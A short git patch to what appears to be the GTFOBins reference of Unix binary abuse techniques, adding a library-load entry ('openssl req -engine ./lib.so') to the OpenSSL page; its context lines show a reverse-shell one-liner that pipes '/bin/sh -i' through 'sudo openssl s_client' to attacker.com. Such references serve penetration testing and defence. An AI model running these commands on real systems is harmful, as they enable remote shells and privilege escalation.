From 041110d54d601a1eb6145247046e4365f3b37181 Mon Sep 17 00:00:00 2001 From: d0zer Date: Sun, 12 Apr 2020 21:20:11 +1200 Subject: [PATCH] Add library load section to OpenSSL --- _gtfobins/openssl.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/_gtfobins/openssl.md b/_gtfobins/openssl.md index b772eba..2933e1b 100644 --- a/_gtfobins/openssl.md +++ b/_gtfobins/openssl.md @@ -79,4 +79,6 @@ functions: RHOST=attacker.com RPORT=12345 mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s + library-load: + - code: openssl req -engine ./lib.so ---